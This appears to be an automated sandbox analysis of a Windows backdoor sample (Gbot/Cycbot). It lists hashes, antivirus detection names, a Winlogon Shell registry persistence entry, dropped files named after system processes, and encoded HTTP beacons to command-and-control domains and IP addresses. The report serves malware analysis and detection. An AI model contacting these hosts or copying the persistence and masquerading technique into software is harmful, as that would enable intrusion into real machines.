Analysis Date: 2014-11-12 22:59:41
MD5: 8b08c822a227ac98057b9c1e7ca5dba1
SHA1: aa81356139930a8431135dbfa20b5a7730e7600e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section: .text md5: eaa274d6dc64e858d75c2962f857ca75 sha1: 0b89f69abec0c7016a3616fd553b01c4481fc993 size: 105984
Section: .rdata md5: 5e2992e48e1559c4bb4574306ecafb1e sha1: 55cbd09717f9a5f6be7c3e18c0222d082cc1c96d size: 2048
Section: .data md5: 5bf88ddee0c939a07bcccb3338adbad1 sha1: 58768b3327563bf0cc41c06fdaf1c5f2ae1fb2c3 size: 61440
Section: .isete md5: 4cc2e25cc78cbc6131c5f20d4c1a73ba sha1: eef162f87ee32b945e586d6081c3b620c8c4dd34 size: 1024
Timestamp: 2005-09-08 13:31:48
Version: ProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1532
PEhash: 987e3fa3f6c06702ead174f1df8afabd573f48c1
IMPhash: f82362b673c2b7817b29c18cb72f29b4
AV 360 Safe: Gen:Trojan.Heur.KS.1
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.G.gen!Eldorado
AV Avira (antivir): BDS/Gbot.aida
AV BullGuard: Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Win32/Diple.A!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-316
AV Dr. Web: BackDoor.Gbot.21
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.LZI
AV Fortinet: W32/FraudLoad.MK!tr
AV Frisk (f-prot): W32/Goolbot.G.gen!Eldorado
AV F-Secure: Gen:Trojan.Heur.KS.1
AV Grisoft (avg): Cryptic.CMZ
AV Ikarus: Backdoor.Win32.Gbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.aid
AV MalwareBytes: Trojan.Agent
AV Mcafee: BackDoor-EXI.gen.i
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Norman: Gen:Trojan.Heur.KS.1
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen3
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: bigmusicarchive.com
Winsock DNS: folusho.com
Winsock DNS: 127.0.0.1
Winsock DNS: moremobileringtons.com
Winsock DNSmoremobileringtons.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: folusho.com
Type: A
67.222.55.143
DNS: zonetf.com
Type: A
141.8.225.80
DNS: zonetf.com
Type: A
141.8.225.80
DNS: bigmusicarchive.com
Type: A
DNS: moremobileringtons.com
Type: A
HTTP GEThttp://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v81=66&tq=gKZEtzyCELDnCGrYvFlL3NsbW9zA4hp%2FfD6eGEZbEs9ey%2FprQRxcla6PmNBcZmfK6CLCe0gDWVgYWb5HXuIM53cFt58vSkrRenq3AH%2FiEu1%2B2FkUKEyB7JanzosirDW%2BTahn0k%2BgUeD4ajx6y94lz79c%2FDaerqm3gC44CzmmPOSvJdoiX%2FhepyMLbyNJcCmmPI1Uxd%2Ba8lrJMcRyBy1WkZPeNcNMEybymTiiKKPllMVwrI1T3%2F90tWO8epjQrjPDuMGKVhfwQqYKuIbuDOAgMRSNWDW8b8JBuaqzaL4hGo9BcFLprGGCJ0i58Pu3bmSUwmVHhwihPuL8%2FmOu4PXCrkHoa40ryJxk6XPtx2jZzjKidUrjxT8I8LIC2jv%2FpMuZWWgNUIFw6vDd%2F2qyg388CRtvZ7nbIYRbKLRQQMQNr79Ut1UCLmgGGe%2BXL
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 67.222.55.143:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap

Strings